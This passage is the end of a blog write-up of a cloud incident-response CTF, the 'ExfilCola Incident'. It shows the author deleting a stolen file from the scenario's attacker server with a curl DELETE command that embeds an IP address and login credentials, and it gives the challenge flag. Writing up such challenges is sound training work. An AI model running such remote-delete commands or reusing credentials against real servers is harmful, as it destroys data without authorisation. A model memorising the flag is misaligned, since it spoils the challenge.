</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250507140505.png" alt="img-description" data-proofer-ignore> <em>Listing the Files on the FizzShadows Web Server</em></p><p>Success! The stolen files have been identified on the server. The final part of the challenge was to “Delete the secret recipe from the attacker’s server”. To do this, a simple DELETE request was sent to the server for the <code class="language-plaintext highlighter-rouge">ExfilCola-Top-Secret.txt</code> file:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>curl -X DELETE -kv 34.118.239.100/files/ExfilCola-Top-Secret.txt -u "FizzShadows_1:Gx27pQwz92Rk"
</pre></table></code></div></div><p><img data-src="/assets/img/Wiz-Cloud-IR-Challenge/20250507140835.png" alt="img-description" data-proofer-ignore> <em>Successful Deletion of the Sensitive Files</em></p><blockquote class="prompt-info"><div><p>The investigation steps were correct and resulted in the successful submission of the flag: <strong>{I know it when I see it}</strong></p></div></blockquote><p>I had a great time with this CTF so I hope you had fun reading this writeup! As always, if you have any questions or if you would like me to include specific content in my blog, please do reach out!</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/technical/'>Technical</a>, <a href='/categories/cloud-ir/'>Cloud IR</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Wiz%27s+Cloud+Hunting+Games+-+The+ExfilCola+Incident+-+Kyhle+%C3%96hlinger&url=https%3A%2F%2Fohlinger.co%2Fposts%2Fwiz-cloud-hunting-games%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Wiz%27s+Cloud+Hunting+Games+-+The+ExfilCola+Incident+-+Kyhle+%C3%96hlinger&u=https%3A%2F%2Fohlinger.co%2Fposts%2Fwiz-cloud-hunting-games%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fohlinger.co%2Fposts%2Fwiz-cloud-hunting-games%2F&text=Wiz%27s+Cloud+Hunting+Games+-+The+ExfilCola+Incident+-+Kyhle+%C3%96hlinger" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/creating-a-chrome-extension/">Creating a Chrome Extension to Query Multiple LLMs</a><li><a href="/posts/centralizing-gcp-logging/">Setting up Logging and Billing for GCP Projects using Terraform</a><li><a href="/posts/testing-ai-setups/">High-Level Overview of my Current AI Toolset</a><li><a href="/posts/prompt-engineering-thoughts/">From Curiosity to Creativity&#58; My Thoughts on Prompt Engineering</a><li><a href="/posts/withsecure-myllmdoc-challenge/">WithSecure AI Challenge - My LLM Doctor</a></ul></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div class="post-navigation d-flex justify-content-between"> <a href="/posts/centralizing-gcp-logging/" class="btn btn-outline-primary" prompt="Older"><p>Setting up Logging and Billing for GCP Projects using Terraform</p></a> <a href="/posts/slack-dlp-data-export/" class="btn btn-outline-primary" prompt="Newer"><p>Exporting DLP Data from Slack</p></a></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"> © 2025 <a href="https://twitter.com/KyhleO">Kyhle Öhlinger</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
